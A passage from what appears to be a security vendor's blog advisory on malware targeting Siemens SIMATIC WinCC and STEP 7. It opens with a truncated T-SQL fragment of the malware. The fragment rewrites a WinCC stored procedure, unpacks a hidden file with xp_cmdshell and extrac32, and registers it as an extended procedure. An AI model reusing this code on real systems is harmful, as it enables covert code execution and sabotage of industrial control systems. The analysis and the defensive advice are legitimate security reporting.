declare @t varchar(4000), @e int, @f int if exists (select * from dbo.syscomments where(N'[dbo].[MCPVPROJECT2]')) select @t=rtrim(c.text) from dbo.syscomments c, dbo.sysobjects o     where o.id = c.id and c.id = object_id(N'[dbo].[MCPVPROJECT2]') order by c.number, c.colid  set @e=charindex('--CC-SP',@t)  if @e=0  begin set @f=charindex('where',@t) if @f<>0 set @t=left(@t,@f-1) set @t=right(@t,len(@t)-6)  end else  select * from fail_in_order_to_return_false  set @t='alter '+@t+' where ((SELECT top 1 1 FROM MCPVREADVARPERCON)=''1'') --CC-SP use master;declare @t varchar(999),@s varchar(999),@a int declare r cursor for select filename from master..sysdatabases where (name like ''CC%'') open r fetch next from r into @t while (@@fetch_status<>-1) begin set @t=left(@t,len(@t)-charindex(''\'',reverse(@t)))+''\GraCS\cc_tlg7.sav'';exec master..xp_fileexist @t,@a out;if @a=1 begin set @s = ''master..xp_cmdshell ''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t = @t+''x'';dbcc addextendedproc(s

The mentioned strings are assumed to belong to SIMATIC WinCC and SIMATIC Siemens STEP 7, which are popular softwares used in industrial processes. The malware is supposedly aimed at attacking such systems. Another interesting fact is that countries most widely affected by this malware are Iran, Indonesia and India.

• Image courtesy Microsoft Threat Research and Response Blog

Microsoft has released a workaround until a patch is released which can be found here http://support.microsoft.com/kb/2286198#FixItForMe. Do update your respective antivirus system and make sure to scan any external device before using it. We at Emsisoft are constantly working hard to remain ahead as we will always be.